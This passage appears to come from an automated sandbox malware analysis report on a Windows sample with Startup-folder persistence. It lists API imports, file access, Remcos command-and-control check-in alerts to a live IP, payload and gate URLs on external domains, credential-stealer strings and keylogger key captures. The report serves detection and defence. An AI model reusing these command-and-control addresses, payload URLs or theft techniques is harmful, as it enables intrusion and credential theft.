asic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_tr
aits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator
@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini

                    Networking

                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49751 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49815 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49878 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49942 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49982 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49984 -> 154.16.63.197:3360
                    Source: Network traffic Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49981 -> 154.16.63.197:3360
                    Source: Malware configuration extractor URLs: http://admino.ml/eme/gate.php
                    Source: Malware configuration extractor URLs: http://admino.ml/eme/kachistub.exe
                    Source: global traffic TCP traffic: 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Dec 2024 16:57:34 GMTContent-Type: application/x-msdownloadContent-Length: 853504Connection: keep-aliveLast-Modified: Wed, 06 Jun 2018 00:46:15 GMTAccept-Ranges: bytesCache-Control: max-age=259200Expires: Mon, 16 Dec 2024 16:57:34 GMT
                    Source: Joe Sandbox View ASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
                    Source: Network traffic Suricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.5:49704 -> 93.125.99.121:80
                    Source: global traffic HTTP traffic detected: GET /tags/scan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mva.byConnection: Keep-Alive
                    Source: unknown TCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: 11_2_004020D0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004020D0
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SGS.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global traffic DNS traffic detected: DNS query: www.mva.by
                    Source: global traffic DNS traffic detected: DNS query: admino.ml
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: http://admino.ml/eme/gate.php
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: http://admino.ml/eme/kachistub.exe
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ftp://operawand.dat_Software
                    Source: SGS.exe, 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/=
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/G
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/T
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exe
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeLMEM
                    Source: file.exe, 00000009.00000002.2306159539.000000000090E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000009.00000003.2304232651.00000000008FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeRRC:
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exe_A
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.execrC:
                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeh
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mva.by/tags/scan.exeystem32
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: file.exe, 00000000.00000002.2142430073.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Esc] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Enter] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Tab] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Down] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Right] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Up] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [Left] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [End] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe Code function: [F2] 11_2_004051EA
